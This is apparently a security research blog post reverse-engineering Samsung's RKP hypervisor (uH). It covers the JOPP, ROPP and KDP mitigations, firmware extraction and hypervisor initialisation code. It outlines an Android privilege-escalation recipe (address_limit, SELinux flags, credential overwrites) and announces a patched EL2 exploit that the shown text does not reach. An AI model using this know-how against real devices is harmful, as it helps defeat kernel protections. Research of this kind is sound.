The first goal of this blog post is to serve as a comprehensive reference on Samsung RKP's inner workings. It enables anyone to start poking at this obscure code that is executing at a high privilege level on their device. Our explanations are often accompanied by snippets of decompiled code that you can feel free to skip over.
The second goal, and maybe of interest to more people, is to reveal a now-fixed vulnerability that allows getting code execution at EL2 in Samsung RKP. It is a good example of a simple mistake that compromises platform security, as the exploit consists of a single call that makes hypervisor memory writable from EL1.
In the first part, we will talk briefly about Samsung's kernel mitigations (which would probably deserve a blog post of their own). In the second part, we will explain how to get your hands on the RKP binary for your device.
In the third part, we will start taking apart the hypervisor framework that supports RKP on the Exynos devices, before digging into the internals of RKP in the fourth part. We will detail how it is started, how it processes the kernel pages tables, how it protects sensitive data structures, and finally how it enables the kernel mitigations.
In the fifth and last part, we will reveal the vulnerability, the one-liner exploit and take a look at the patch.
In the mobile device world, security traditionally relied on kernel mechanisms. But history has shown us that the kernel was far from being unbreakable. For most Android devices, finding a kernel vulnerability allows an attacker to modify sensitive kernel data structures, elevate privileges and execute malicious code.
It is also simply not enough to ensure kernel integrity at boot time (using the Verified Boot mechanism). Kernel integrity must also be verified at run time. This is what a security hypervisor aims to do. RKP, or "Real-time Kernel Protection", is the name of Samsung's hypervisor implementation which is part of Samsung KNOX.
There is already a lot of great research that has been done on Samsung RKP, specifically Gal Beniamini's Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection and Aris Thallas's On emulating hypervisors: a Samsung RKP case study which we both highly recommend that you read before this blog post.
A typical local privilege escalation (LPE) flow on Android involves:
- setting the address_limit to -1;
- overwriting selinux_(enable|enforcing) to disable SELinux;
- overwriting the uid, gid, sid, capabilities, etc. of the credentials structure.

Samsung has implemented mitigations to try and make that task as hard as possible for an attacker: JOPP, ROPP and KDP are three of them. Not all Samsung devices have the same mitigations in place though.
Here is what we observed after downloading various firmware updates:
Device | Region | JOPP | ROPP | KDP |
---|---|---|---|---|
Low-end | International | No | No | Yes |
Low-end | United States | No | No | Yes |
High-end | International | Yes | No | Yes |
High-end | United States | Yes | Yes | Yes |
Jump-Oriented Programming Prevention (JOPP) aims to prevent JOP. It is a homemade CFI solution. It first uses a modified compiler toolchain to place a NOP instruction before each function start. It then uses a Python script (Kernel/scripts/rkp_cfp/instrument.py
) to process the compiled kernel binary and replace NOPs with a magic value (0xbe7bad) and indirect branches with a direct branch to a helper function.
The helper function jopp_springboard_blr_rX
(in Kernel/init/rkp_cfp.S
) will check if the value before the target matches the magic value and take the jump if it does, or crash if it doesn't:
.macro springboard_blr, reg
jopp_springboard_blr_\reg:
push RRX, xzr
ldr RRX_32, [\reg, #-4]
subs RRX_32, RRX_32, #0xbe7, lsl #12
cmp RRX_32, #0xbad
b.eq 1f
...
inst 0xdeadc0de //crash for sure
...
1:
pop RRX, xzr
br \reg
.endm
Return-Oriented Programming Prevention (ROPP) aims to prevent ROP. It is a homemade "stack canary". It uses the same modified compiler toolchain to emit NOP instructions before stp x29, x30
instructions and after ldp x29, x30
instructions, and to prevent allocation of registers X16 and X17. It then uses the same Python script to replace the prologues and epilogues of assembled C functions like so:
nop
stp x29, x30, [sp,#-<frame>]!
(insns)
ldp x29, x30, ...
nop
is replaced with
eor RRX, x30, RRK
stp x29, RRX, [sp,#-<frame>]!
(insns)
ldp x29, RRX, ...
eor x30, RRX, RRK
where RRX
is an alias for X16 and RRK
for X17.
RRK is called the "thread key" and is unique to each kernel task. So instead of pushing the return address directly onto the stack, it is first XORed with this key, preventing an attacker from changing the return address without knowledge of the thread key.
The thread key itself is stored in the rrk
field of the thread_info
structure, but XORed with the RRMK.
struct thread_info {
// ...
unsigned long rrk;
};
RRMK is called the "master key". On production devices, it is stored in the DBGBVR5_EL1
(Debug Breakpoint Value Register 5) system register. It is set by the hypervisor during kernel initialization as we will see later.
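To make the masking concrete, here is a minimal sketch (our own, not Samsung's code) of the operations performed by the rewritten prologues and epilogues:

#include <stdint.h>

/* Minimal sketch of the ROPP masking described above (our reconstruction).
 * The value saved on the stack by the rewritten prologue is the real return
 * address XORed with the per-task thread key, and the thread key itself is
 * stored in thread_info->rrk XORed with the master key (RRMK). */
uint64_t ropp_mask_lr(uint64_t lr, uint64_t rrk_field, uint64_t rrmk) {
    uint64_t thread_key = rrk_field ^ rrmk; /* RRK recovered from thread_info */
    return lr ^ thread_key;                 /* what "eor RRX, x30, RRK" produces */
}

uint64_t ropp_unmask_lr(uint64_t saved_lr, uint64_t rrk_field, uint64_t rrmk) {
    return saved_lr ^ (rrk_field ^ rrmk);   /* what "eor x30, RRX, RRK" recomputes */
}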
Kernel Data Protection (KDP) is another hypervisor-enabled mitigation. It is a homemade Data Flow Integrity (DFI) solution. It makes sensitive kernel data structures (like the page tables, struct cred
, struct task_security_struct
, struct vfsmount
, SELinux status, etc.) read-only thanks to the hypervisor.
For understanding Samsung RKP, you will need some basic knowledge about the virtualization extensions on ARMv8 platforms. We recommend that you read the section "HYP 101" of Lifting the (Hyper) Visor or the section "ARM Architecture & Virtualization Extensions" of On emulating hypervisors.
To paraphrase these chapters, a hypervisor is executing at a higher privilege level than the kernel, which gives it complete control over it. Here is what the architecture looks like on ARMv8 platforms:
The hypervisor can receive calls from the kernel via the HyperVisor Call (HVC) instruction. Moreover, by using the Hypervisor Configuration Register (HCR), the hypervisor can trap critical operations usually handled by the kernel (access to virtual memory control registers, etc.) and also handle general exceptions.
Finally, the hypervisor takes advantage of a second layer of address translation, called "stage 2 translation". In the standard "stage 1 translation", a Virtual Address (VA) is translated into an Intermediate Physical Address (IPA). Then this IPA is translated into the final Physical Address (PA) by the second stage.
Here is what the address translation looks like with 2-stage address translation enabled:
The hypervisor still only has a single stage address translation for its own memory accesses.
To make it easier to get started with this research, we have been using a bootloader-unlocked Samsung A51 (SM-A515F) instead of a full exploit chain. We downloaded the kernel sources for our device from the Samsung Open Source website, modified them, and recompiled them (that did not work out of the box).
For this research, we have implemented new syscalls:
- kernel memory allocation/freeing;
- arbitrary read/write of kernel memory;
- hypervisor call (using the uh_call
function).
These syscalls make it really convenient to interact with RKP, as you will see in the exploitation section: we just need to write a piece of C code (or Python) that will execute in userland and perform whatever we want.
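As an illustration, a userland wrapper around our hypervisor call syscall could look like the sketch below. The syscall number and argument order are ours (chosen when patching the kernel) and purely hypothetical; the uh_call command interface itself is described later in this post.

#include <stdint.h>
#include <unistd.h>
#include <sys/syscall.h>

/* Hypothetical syscall number picked when adding the syscall to our kernel. */
#define __NR_uh_call 449

/* Forwards its arguments to the kernel's uh_call(), i.e. to the HVC instruction. */
static long uh_call_user(uint64_t app_id, uint64_t cmd_id, uint64_t arg0,
                         uint64_t arg1, uint64_t arg2, uint64_t arg3) {
    return syscall(__NR_uh_call, app_id, cmd_id, arg0, arg1, arg2, arg3);
}

int main(void) {
    /* Example: command #0 of APP_INIT (0xC300C000), detailed later in the post. */
    return (int)uh_call_user(0xC300C000, 0x0, 0, 0, 0, 0);
}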
RKP is implemented for both Exynos and Snapdragon-equipped devices, and both implementations share a lot of code. However, most if not all of the existing research has been done on the Exynos variant, as it is the most straightforward to dig into: RKP is available as a standalone binary. On Snapdragon devices, it is embedded inside the Qualcomm Hypervisor Execution Environment (QHEE) image which is very large and complicated.
On Exynos devices, RKP used to be embedded directly into the kernel binary and so it could be found as the vmm.elf
file in the kernel source archives. Around late 2017/early 2018, VMM was rewritten into a new framework called uH, which most likely stands for "micro-hypervisor". Consequently, the binary has been renamed to uh.elf
and can still be found in the kernel source archives for a few devices.
Following Gal Beniamini's first suggested design improvement, on most devices RKP has been moved out of the kernel binary and into a partition of its own called uh
. That makes it even easier to extract, for example by grabbing it from the BL_xxx.tar
archive contained in a firmware update (it is usually LZ4-compressed and starts with a 0x1000 bytes header that needs to be stripped to get to the real ELF file).
The architecture has changed slightly on the S20 and later devices, as Samsung has introduced another framework to support RKP (called H-Arx
), most likely to unify even more the code base with the Snapdragon devices, and it also features more uH "apps". However, we won't be taking a look at it in this blog post.
On Snapdragon devices, RKP can be found in the hyp
partition, and can also be extracted from the BL_xxx.tar
archive in a firmware update. It is one of the segments that make up the QHEE image.
The main difference with Exynos devices is that it is QHEE that sets the page tables and the exception vector. As a result, it is QHEE that notifies uH when exceptions happen (HVC or trapped system register), and uH has to make a call to QHEE when it wants to modify the page tables. The rest of the code is almost identical.
Back in 2017, the RKP binary was shipped with symbols and log strings. That isn't the case anymore: nowadays the binaries are stripped, and the log strings are replaced with placeholders (like Qualcomm does). Nevertheless, we tried getting our hands on as many binaries as possible, hoping that Samsung did not do that for all of their devices, as is sometimes the case with other OEMs.
By mass downloading firmware updates for various Exynos devices, we gathered around ~300 unique hypervisor binaries. None of the uh.elf
files had symbols, so we had to manually port them over from the old vmm.elf
files. Some of the uh.elf
files had the full log strings, the latest one being from Apr 9 2019.
With the full log strings and their hashed versions, we could figure out that the hash value is simply a truncation of the SHA-256 output. Here is a Python one-liner to calculate the hash in case you need it:
hashlib.sha256(log_string).hexdigest()[:8]
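If you prefer computing it from C, the same truncation can be done with OpenSSL's SHA-256 (the first 4 bytes of the digest are the 8 hex characters of the placeholder):

#include <stdio.h>
#include <string.h>
#include <openssl/sha.h>

/* Prints the 8-character placeholder that uH derives from a full log string. */
void print_log_hash(const char *log_string) {
    unsigned char digest[SHA256_DIGEST_LENGTH];
    SHA256((const unsigned char *)log_string, strlen(log_string), digest);
    for (int i = 0; i < 4; ++i) /* 4 bytes = 8 hex characters */
        printf("%02x", digest[i]);
    printf("\n");
}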
The uH framework acts as a micro-OS, of which RKP is an application. This is really more of a way to organize things, as "apps" are simply a bunch of command handlers and don't have any kind of isolation.
Before digging into the code, we will briefly tell you about the utility structures that are used extensively by uH and the RKP app. We won't be detailing their implementation, but it is important to understand what they do.
The memlist_t
structure is defined like so (names are our own):
typedef struct memlist {
memlist_entry_t *base;
uint32_t capacity;
uint32_t count;
uint32_t merged;
crit_sec_t cs;
} memlist_t;
It is a list of address ranges, a sort of specialized version of a C++ vector (it has a capacity and a size).
The memlist entries are defined like so:
typedef struct memlist_entry {
uint64_t addr;
uint64_t size;
uint64_t field_10;
uint64_t extra;
} memlist_entry_t;
There are utility functions to add and remove ranges from a memlist, to check if an address is contained in a memlist, or if a range overlaps with a memlist, etc.
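For instance, the address containment check used throughout the code could be sketched as follows (our own illustration based on the structure definitions above, not the decompiled implementation):

int memlist_contains_addr_sketch(memlist_t *list, uint64_t addr) {
    /* Walks the entries and checks whether addr falls inside one of the ranges. */
    for (uint32_t i = 0; i < list->count; ++i) {
        memlist_entry_t *entry = &list->base[i];
        if (addr >= entry->addr && addr < entry->addr + entry->size)
            return 1;
    }
    return 0;
}

A real implementation would also take the memlist's critical section before walking the entries.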
The sparsemap_t
structure is defined like so (names are our own):
typedef struct sparsemap {
char name[8];
uint64_t start_addr;
uint64_t end_addr;
uint64_t count;
uint64_t bit_per_page;
uint64_t mask;
crit_sec_t cs;
memlist_t *list;
sparsemap_entry_t *entries;
uint32_t private;
uint32_t field_54;
} sparsemap_t;
The sparsemap is a map that associates values to addresses. It is created from a memlist and will map all the addresses in this memlist to a value. The size of this value is determined by the bit_per_page
field.
The sparsemap entries are defined like so:
typedef struct sparsemap_entry {
uint64_t addr;
uint64_t size;
uint64_t bitmap_size;
uint8_t* bitmap;
} sparsemap_entry_t;
There are functions to get and set the value for each entry of the map, etc.
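As a rough illustration of how a lookup might work for a 1-bit-per-page map (our own sketch; it ignores larger bit_per_page values and the locking):

int64_t sparsemap_get_bit_sketch(sparsemap_t *map, uint64_t addr) {
    if (addr < map->start_addr || addr >= map->end_addr)
        return -1;
    for (uint64_t i = 0; i < map->count; ++i) {
        sparsemap_entry_t *entry = &map->entries[i];
        if (addr >= entry->addr && addr < entry->addr + entry->size) {
            uint64_t page = (addr - entry->addr) >> 12; /* one bit per 4KB page */
            return (entry->bitmap[page >> 3] >> (page & 7)) & 1;
        }
    }
    return -1;
}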
The crit_sec_t
structure is used to implement critical sections (names are our own):
typedef struct crit_sec {
uint32_t cpu;
uint32_t lock;
uint64_t lr;
} crit_sec_t;
And of course, there are functions to enter and exit the critical sections.
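Given the fields above, a plausible implementation is a spinlock that also records which CPU took the lock and from where, for debugging purposes (again, our own sketch rather than the actual uH code):

void cs_enter_sketch(crit_sec_t *cs, uint32_t current_cpu) {
    while (__atomic_exchange_n(&cs->lock, 1, __ATOMIC_ACQUIRE))
        ; /* spin until the lock is released */
    cs->cpu = current_cpu;
    cs->lr = (uint64_t)__builtin_return_address(0); /* caller, for debugging */
}

void cs_exit_sketch(crit_sec_t *cs) {
    __atomic_store_n(&cs->lock, 0, __ATOMIC_RELEASE);
}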
uH/RKP is loaded into memory by S-Boot (Samsung Bootloader). S-Boot jumps to the EL2 entry-point by asking the secure monitor (running at EL3) to start executing hypervisor code at the address it specifies.
uint64_t cmd_load_hypervisor() {
// ...
part = FindPartitionByName("UH");
if (part) {
dprintf("%s: loading uH image from %d..\n", "f_load_hypervisor", part->block_offset);
ReadPartition(&hdr, part->file_offset, part->block_offset, 0x4C);
dprintf("[uH] uh page size = 0x%x\n", (((hdr.size - 1) >> 12) + 1) << 12);
total_size = hdr.size + 0x1210;
dprintf("[uH] uh total load size = 0x%x\n", total_size);
if (total_size > 0x200000 || hdr.size > 0x1FEDF0) {
dprintf("Could not do normal boot.(invalid uH length)\n");
// ...
}
ret = memcmp_s(&hdr, "GREENTEA", 8);
if (ret) {
ret = -1;
dprintf("Could not do uh load. (invalid magic)\n");
// ...
} else {
ReadPartition(0x86FFF000, part->file_offset, part->block_offset, total_size);
ret = pit_check_signature(part->partition_name, 0x86FFF000, total_size);
if (ret) {
dprintf("Could not do uh load. (invalid signing) %x\n", ret);
// ...
}
load_hypervisor(0xC2000400, 0x87001000, 0x2000, 1, 0x87000000, 0x100000);
dprintf("[uH] load hypervisor\n");
}
} else {
ret = -1;
dprintf("Could not load uH. (invalid ppi)\n");
// ...
}
return ret;
}
void load_hypervisor(...) {
dsb();
asm("smc #0");
isb();
}
Note: On recent Samsung devices, the monitor code (based on ATF - ARM Trusted Firmware) is no longer in plaintext in the S-Boot binary. In its place can be found an encrypted blob. A vulnerability in Samsung's Trusted OS implementation (TEEGRIS) will need to be found so that the plaintext monitor code can be dumped.
void default(...) {
// ...
if (get_current_el() == 8) {
// Save registers x0 to x30, sp_el1, elr_el2, spsr_el2
// ...
memset(&rkp_bss_start, 0, 0x1000);
main(saved_regs.x0, saved_regs.x1, &saved_regs);
}
asm("smc #0");
}
Execution starts in the default
function. This function checks if it is running at EL2 before calling main
. Once main
returns, it makes an SMC, presumably to give the control back to S-Boot.
int32_t main(int64_t x0, int64_t x1, saved_regs_t* regs) {
// ...
// Setting A=0 (Alignment fault checking disabled)
// SA=0 (SP Alignment check disabled)
set_sctlr_el2(get_sctlr_el2() & 0xFFFFFFF5);
if (!initialized) {
initialized = 1;
// Check if loading address is as expected
if (&hyp_base != 0x87000000) {
uh_log('L', "slsi_main.c", 326, "[-] static s1 mmu mismatch");
return -1;
}
set_ttbr0_el2(&static_s1_page_tables_start__);
s1_enable();
uh_init(0x87000000, 0x200000);
if (vmm_init())
return -1;
uh_log('L', "slsi_main.c", 338, "[+] vmm initialized");
set_vttbr_el2(&static_s2_page_tables_start__);
uh_log('L', "slsi_main.c", 348, "[+] static s2 mmu initialized");
s2_enable();
uh_log('L', "slsi_main.c", 351, "[+] static s2 mmu enabled");
}
uh_log('L', "slsi_main.c", 355, "[*] initialization completed");
return 0;
}
After disabling the alignment checks and making sure the binary is loaded at the expected address (0x87000000 for this binary), main
sets TTBR0_EL2
to its initial page tables and calls s1_enable
.
void s1_enable() {
// ...
cs_init(&s1_lock);
// Setting Attr0=0xff (Normal memory, Outer & Inner Write-Back Non-transient,
// Outer & Inner Read-Allocate Write-Allocate)
// Attr1=0x00 (Device-nGnRnE memory)
// Attr2=0x44 (Normal memory, Outer & Inner Write-Back Transient,
// Outer & Inner No Read-Allocate No Write-Allocate)
set_mair_el2(get_mair_el2() & 0xFFFFFFFFFF000000 | 0x4400FF);
// Setting T0SZ=24 (TTBR0_EL2 region size is 2^40)
// IRGN0=0b11 && ORGN0=0b11
// (Normal memory, Outer & Inner Write-Back
// Read-Allocate No Write-Allocate Cacheable)
// SH0=0b11 (Inner Shareable)
// PAS=0b010 (PA size is 40 bits, 1TB)
  set_tcr_el2(get_tcr_el2() & 0xFFF8C0C0 | 0x23F18);
flush_entire_cache();
sctlr_el2 = get_sctlr_el2();
// Setting C=1 (data is cacheable for EL2)
// I=1 (instruction access is cacheable for EL2)
// WXN=1 (writeable implies non-executable for EL2)
set_sctlr_el2(sctlr_el2 & 0xFFF7EFFB | 0x81004);
invalidate_entire_s1_el2_tlb();
// Setting M=1 (EL2 stage 1 address translation enabled)
set_sctlr_el2(sctlr_el2 & 0xFFF7EFFA | 0x81005);
}
s1_enable
sets mostly cache-related fields of MAIR_EL2
, TCR_EL2
and SCTLR_EL2
, and most importantly enables the MMU for the EL2. main
then calls the uh_init
function and passes it the uH memory range.
We can already see that Gal Beniamini's second suggested design improvement, setting the WXN bit to 1, has also been implemented by the Samsung KNOX team.
int64_t uh_init(int64_t uh_base, int64_t uh_size) {
// ...
memset(&uh_state.base, 0, sizeof(uh_state));
uh_state.base = uh_base;
uh_state.size = uh_size;
static_heap_initialize(uh_base, uh_size);
if (!static_heap_remove_range(0x87100000, 0x40000) || !static_heap_remove_range(&hyp_base, 0x87046000 - &hyp_base) ||
!static_heap_remove_range(0x870FF000, 0x1000)) {
uh_panic();
}
memory_init();
uh_log('L', "main.c", 131, "================================= LOG FORMAT =================================");
uh_log('L', "main.c", 132, "[LOG:L, WARN: W, ERR: E, DIE:D][Core Num: Log Line Num][File Name:Code Line]");
uh_log('L', "main.c", 133, "==============================================================================");
uh_log('L', "main.c", 134, "[+] uH base: 0x%p, size: 0x%lx", uh_state.base, uh_state.size);
uh_log('L', "main.c", 135, "[+] log base: 0x%p, size: 0x%x", 0x87100000, 0x40000);
uh_log('L', "main.c", 137, "[+] code base: 0x%p, size: 0x%p", &hyp_base, 0x46000);
uh_log('L', "main.c", 139, "[+] stack base: 0x%p, size: 0x%p", stacks, 0x10000);
uh_log('L', "main.c", 143, "[+] bigdata base: 0x%p, size: 0x%p", 0x870FFC40, 0x3C0);
uh_log('L', "main.c", 152, "[+] date: %s, time: %s", "Feb 27 2020", "17:28:58");
uh_log('L', "main.c", 153, "[+] version: %s", "UH64_3b7c7d4f exynos9610");
uh_register_commands(0, init_cmds, 0, 5, 1);
j_rkp_register_commands();
uh_log('L', "main.c", 370, "%d app started", 1);
system_init();
apps_init();
uh_init_bigdata();
uh_init_context();
memlist_init(&uh_state.dynamic_regions);
pa_restrict_init();
uh_state.inited = 1;
uh_log('L', "main.c", 427, "[+] uH initialized");
  return 0;
}
After saving the arguments into a global control structure we named uh_state
, uh_init
calls static_heap_initialize
. This function saves its arguments into global variables, and also initializes the doubly linked list of heap chunks with a single free chunk spanning the whole uH static memory range.
uh_init then calls static_heap_remove_range to remove 3 important ranges from the memory that can be returned by the static heap allocator (effectively splitting the original chunk into multiple ones):

- the log region (0x87100000, size 0x40000);
- the uH code itself (0x87000000 up to 0x87046000);
- the bigdata region (0x870FF000, size 0x1000).

uh_init then calls memory_init.
int64_t memory_init() {
memory_buffer = 0x87100000;
memset(0x87100000, 0, 0x40000);
cs_init(&memory_cs);
clean_invalidate_data_cache_region(0x87100000, 0x40000);
memory_buffer_index = 0;
memory_active = 1;
return s1_map(0x87100000, 0x40000, UNKN3 | WRITE | READ);
}
This function zeroes out the log region and maps it into the EL2 page tables. This region will be used by the *printf
string printing functions which are called inside of the uh_log
function.
uh_init
then logs various information using uh_log
(these messages can be retrieved from /proc/uh_log
on the device). uh_init
then calls uh_register_commands
and rkp_register_commands
(which also calls uh_register_commands
but with a different set of arguments).
int64_t uh_register_commands(uint32_t app_id,
int64_t cmd_array,
int64_t cmd_checker,
uint32_t cmd_count,
uint32_t flag) {
// ...
if (uh_state.inited)
uh_log('D', "event.c", 11, "uh_register_event is not permitted after uh_init : %d", app_id);
if (app_id >= 8)
uh_log('D', "event.c", 14, "wrong app_id %d", app_id);
uh_state.cmd_evtable[app_id] = cmd_array;
uh_state.cmd_checkers[app_id] = cmd_checker;
uh_state.cmd_counts[app_id] = cmd_count;
  uh_state.cmd_flags[app_id] = flag;
uh_log('L', "event.c", 21, "app_id:%d, %d events and flag(%d) has registered", app_id, cmd_count, flag);
if (cmd_checker)
uh_log('L', "event.c", 24, "app_id:%d, cmd checker enforced", app_id);
return 0;
}
uh_register_commands
takes as arguments the application ID, an array of command handlers, an optional command "checker" function, the number of commands in the array, and a debug flag. These values will be stored in the fields cmd_evtable
, cmd_checkers
, cmd_counts
and cmd_flags
of the uh_state
structure.
According to the kernel sources, there are only 3 applications defined, even though uH supports up to 8.
// from include/linux/uh.h
#define APP_INIT 0
#define APP_SAMPLE 1
#define APP_RKP 2
#define UH_PREFIX UL(0xc300c000)
#define UH_APPID(APP_ID) ((UL(APP_ID) & UL(0xFF)) | UH_PREFIX)
enum __UH_APP_ID {
UH_APP_INIT = UH_APPID(APP_INIT),
UH_APP_SAMPLE = UH_APPID(APP_SAMPLE),
UH_APP_RKP = UH_APPID(APP_RKP),
};
uh_init
then calls system_init
and apps_init
.
uint64_t system_init() {
// ...
memset(&saved_regs, 0, sizeof(saved_regs));
res = uh_handle_command(0, 0, &saved_regs);
if (res)
uh_log('D', "main.c", 380, "system init failed %d", res);
return res;
}
uint64_t apps_init() {
// ...
memset(&saved_regs, 0, sizeof(saved_regs));
for (i = 1; i != 8; ++i) {
if (uh_state.cmd_evtable[i]) {
uh_log('W', "main.c", 393, "[+] dst %d initialized", i);
res = uh_handle_command(i, 0, &saved_regs);
if (res)
uh_log('D', "main.c", 396, "app init failed %d", res);
}
}
return res;
}
These functions call command #0: system_init calls it for APP_INIT, and apps_init calls it for all the other registered applications. In our case, it will end up calling init_cmd_init
and rkp_cmd_init
as we will see later.
int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
// ...
if ((uh_state.cmd_flags[app_id] & 1) != 0)
uh_log('L', "main.c", 441, "event received %lx %lx %lx %lx %lx %lx", app_id, cmd_id, regs->x2, regs->x3, regs->x4,
regs->x5);
cmd_checker = uh_state.cmd_checkers[app_id];
if (cmd_id && cmd_checker && cmd_checker(cmd_id)) {
uh_log('E', "main.c", 448, "cmd check failed %d %d", app_id, cmd_id);
return -1;
}
if (app_id >= 8)
uh_log('D', "main.c", 453, "wrong dst %d", app_id);
if (!uh_state.cmd_evtable[app_id])
uh_log('D', "main.c", 456, "dst %d evtable is NULL\n", app_id);
if (cmd_id >= uh_state.cmd_counts[app_id])
uh_log('D', "main.c", 459, "wrong type %lx %lx", app_id, cmd_id);
cmd_handler = uh_state.cmd_evtable[app_id][cmd_id];
if (!cmd_handler) {
uh_log('D', "main.c", 464, "no handler %lx %lx", app_id, cmd_id);
return -1;
}
return cmd_handler(regs);
}
uh_handle_command
prints the app ID, command ID and its arguments if the debug flag was set, calls the command checker function if specified, then calls the appropriate command handler.
uh_init
then calls uh_init_bigdata
and uh_init_context
.
int64_t uh_init_bigdata() {
if (!bigdata_state)
bigdata_state = malloc(0x230, 0);
memset(0x870FFC40, 0, 960);
memset(bigdata_state, 0, 560);
return s1_map(0x870FF000, 0x1000, UNKN3 | WRITE | READ);
}
uh_init_bigdata
allocates and zeroes out the buffers used by the analytics feature. It also makes the bigdata region accessible as read and write in the EL2 page tables.
int64_t* uh_init_context() {
// ...
uh_context = malloc(0x1000, 0);
if (!uh_context)
uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
return memset(uh_context, 0, 0x1000);
}
uh_init_context
allocates and zeroes out a buffer that is used to store the hypervisor registers on platform resets (we don't know where it is used, maybe by the monitor to restore the hypervisor state on some event).
uh_init
calls memlist_init
to initialize the dynamic_regions
memlist in the uh_state
structure, and then calls the pa_restrict_init
function.
int64_t pa_restrict_init() {
memlist_init(&protected_ranges);
memlist_add(&protected_ranges, 0x87000000, 0x200000);
if (!memlist_contains_addr(&protected_ranges, rkp_cmd_counts))
uh_log('D', "pa_restrict.c", 79, "Error, cmd_cnt not within protected range, cmd_cnt addr : %lx", rkp_cmd_counts);
if (!memlist_contains_addr(&protected_ranges, (uint64_t)&protected_ranges))
uh_log('D', "pa_restrict.c", 84, "Error protect_ranges not within protected range, protect_ranges addr : %lx",
&protected_ranges);
return uh_log('L', "pa_restrict.c", 87, "[+] uH PA Restrict Init");
}
pa_restrict_init
initializes the protected_ranges
memlist, and adds the uH memory region to it. It also checks that rkp_cmd_counts
and the protected_ranges
structures are contained in the memlist.
uh_init
returns to main
, which then calls vmm_init
.
int64_t vmm_init() {
// ...
uh_log('L', "vmm.c", 142, ">>vmm_init<<");
cs_init(&stru_870355E8);
cs_init(&panic_cs);
set_vbar_el2(&vmm_vector_table);
// Setting TVM=1 (EL1 write accesses to the specified EL1 virtual
// memory control registers are trapped to EL2)
hcr_el2 = get_hcr_el2() | 0x4000000;
uh_log('L', "vmm.c", 161, "RKP_398bc59b %x", hcr_el2);
set_hcr_el2(hcr_el2);
return 0;
}
vmm_init
sets the VBAR_EL2
register to the exception vector used by the hypervisor and enables trapping of writes to the virtual memory control registers at EL1.
main then sets the VTTBR_EL2 register to the initial page tables that will be used for the second stage address translation for memory accesses at EL1. Finally, before returning, it calls s2_enable
.
void s2_enable() {
// ...
cs_init(&s2_lock);
// Setting T0SZ=24 (VTTBR_EL2 region size is 2^40)
// SL0=0b01 (Stage 2 translation lookup start at level 1)
// IRGN0=0b11 && ORGN0=0b11
// (Normal memory, Outer & Inner Write-Back
// Read-Allocate No Write-Allocate Cacheable)
// SH0=0b11 (Inner Shareable)
// TG0=0b00 (Granule size is 4KB)
// PS=0b010 (PA size is 40 bits, 1TB)
set_vtcr_el2(get_vtcr_el2() & 0xFFF80000 | 0x23F58);
invalidate_entire_s1_s2_el1_tlb();
// Setting VM=1
set_hcr_el2(get_hcr_el2() | 1);
lock_start = 1;
}
s2_enable
configures the second stage address translation registers and enables it.
We mentioned that uh_init
calls the command #0 for each of the registered applications. Let's see what is being executed for the two applications APP_INIT
(some kind of init
process equivalent) and APP_RKP
.
APP_INIT
The command handlers registered for APP_INIT
are:
Command ID | Command Handler | Maximum Calls |
---|---|---|
0x00 | init_cmd_init | - |
0x02 | init_cmd_add_dynamic_region | - |
0x03 | init_cmd_id_0x03 | - |
0x04 | init_cmd_initialize_dynamic_heap | - |
Let's take a look at command #0 called during startup by uH.
int64_t init_cmd_init(saved_regs_t* regs) {
// ...
if (!uh_state.fault_handler && regs->x2) {
uh_state.fault_handler = rkp_get_pa(regs->x2);
uh_log('L', "main.c", 161, "[*] uH fault handler has been registered");
}
return 0;
}
The command #0 handler of APP_INIT
is really simple: it sets the fault_handler
field of uh_state
. This field is set to the address of a kernel structure containing the handler function that will be called when a fault is detected by the hypervisor.
When uH calls this command, it won't do anything as the registers are all set to 0. But this command will also be called later by the kernel, as can be seen in the rkp_init
function from init/main.c
.
// from init/main.c
static void __init rkp_init(void)
{
uh_call(UH_APP_INIT, 0, uh_get_fault_handler(), kimage_voffset, 0, 0);
// ...
}
// from include/linux/uh_fault_handler.h
typedef struct uh_registers {
u64 regs[31];
u64 sp;
u64 pc;
u64 pstate;
} uh_registers_t;
typedef struct uh_handler_data{
esr_t esr_el2;
u64 elr_el2;
u64 hcr_el2;
u64 far_el2;
u64 hpfar_el2;
uh_registers_t regs;
} uh_handler_data_t;
typedef struct uh_handler_list{
u64 uh_handler;
uh_handler_data_t uh_handler_data[NR_CPUS];
} uh_handler_list_t;
// from init/uh_fault_handler.c
void uh_fault_handler(void)
{
unsigned int cpu;
uh_handler_data_t *uh_handler_data;
u32 exception_class;
unsigned long flags;
struct pt_regs regs;
spin_lock_irqsave(&uh_fault_lock, flags);
cpu = smp_processor_id();
uh_handler_data = &uh_handler_list.uh_handler_data[cpu];
exception_class = uh_handler_data->esr_el2.ec;
if (!exception_class_string[exception_class]
|| exception_class > esr_ec_brk_instruction_execution)
exception_class = esr_ec_unknown_reason;
pr_alert("=============uH fault handler logging=============\n");
pr_alert("%s",exception_class_string[exception_class]);
pr_alert("[System registers]\n", cpu);
pr_alert("ESR_EL2: %x\tHCR_EL2: %llx\tHPFAR_EL2: %llx\n",
uh_handler_data->esr_el2.bits,
uh_handler_data->hcr_el2, uh_handler_data->hpfar_el2);
pr_alert("FAR_EL2: %llx\tELR_EL2: %llx\n", uh_handler_data->far_el2,
uh_handler_data->elr_el2);
memset(®s, 0, sizeof(regs));
memcpy(®s, &uh_handler_data->regs, sizeof(uh_handler_data->regs));
do_mem_abort(uh_handler_data->far_el2, (u32)uh_handler_data->esr_el2.bits, ®s);
panic("%s",exception_class_string[exception_class]);
}
u64 uh_get_fault_handler(void)
{
uh_handler_list.uh_handler = (u64) & uh_fault_handler;
return (u64) & uh_handler_list;
}
There are 2 commands of APP_INIT
that are used for initialization-related things (even though they don't have command ID #0). They are not called by the kernel, but by S-Boot before loading/executing the kernel.
int64_t dtb_update(...) {
// ...
dtb_find_entries(dtb, "memory", j_uh_add_dynamic_region);
sprintf(path, "/reserved-memory");
offset = dtb_get_path_offset(dtb, path);
if (offset < 0) {
dprintf("%s: fail to get path [%s]: %d\n", "dtb_update_reserved_memory", path, offset);
} else {
heap_base = 0;
heap_size = 0;
dtb_add_reserved_memory(dtb, offset, 0x87000000, 0x200000, "el2_code", "el2,uh");
uh_call(0xC300C000, 4, &heap_base, &heap_size, 0, 0);
dtb_add_reserved_memory(dtb, offset, heap_base, heap_size, "el2_earlymem", "el2,uh");
dtb_add_reserved_memory(dtb, offset, 0x80001000, 0x1000, "kaslr", "kernel-kaslr");
